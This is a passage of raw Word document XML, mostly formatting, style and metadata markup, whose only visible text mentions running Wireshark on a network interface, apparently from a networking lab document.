          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>wireshark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> on our interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB3357">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB3357" w:rsidRPr="00FB3357" w:rsidRDefault="00FB3357" w:rsidP="00FB335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FB3357" w:rsidRPr="00FB3357" w:rsidRDefault="00555B08" w:rsidP="00FB3357">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00555B08">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5172075" cy="1400175"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"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634" cy="140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57" w:rsidRDefault="00FB3357" w:rsidP="00FB3357"/>
    <w:p w:rsidR="00555B08" w:rsidRDefault="00555B08" w:rsidP="00FB3357"/>
    <w:p w:rsidR="00BC07CB" w:rsidRPr="00FB3357" w:rsidRDefault="00BC07CB" w:rsidP="00FB3357"/>
    <w:sectPr w:rsidR="00BC07CB" w:rsidRPr="00FB3357" w:rsidSect="004450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697B93"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="115C3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F53F61"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="454A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5362C1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8F74F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A1BA2"/>
    <w:rsid w:val="00034CC1"/>
    <w:rsid w:val="000A1BA2"/>
    <w:rsid w:val="001112FA"/>
    <w:rsid w:val="00157FCD"/>
    <w:rsid w:val="003778C0"/>
    <w:rsid w:val="00445044"/>
    <w:rsid w:val="00555B08"/>
    <w:rsid w:val="00582580"/>
    <w:rsid w:val="00BC07CB"/>
    <w:rsid w:val="00BF5414"/>
    <w:rsid w:val="00C4639D"/>
    <w:rsid w:val="00C96F66"/>
    <w:rsid w:val="00D0446B"/>
    <w:rsid w:val="00DA1C55"/>
    <w:rsid w:val="00FB3357"/>
    <w:rsid w:val="00FE5B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B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B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5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41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34CC1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B335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BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00FB3357"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:rsid w:val="00FB33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</dc:creator>
  <cp:lastModifiedBy>LIZA</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-01T17:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-01T19:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>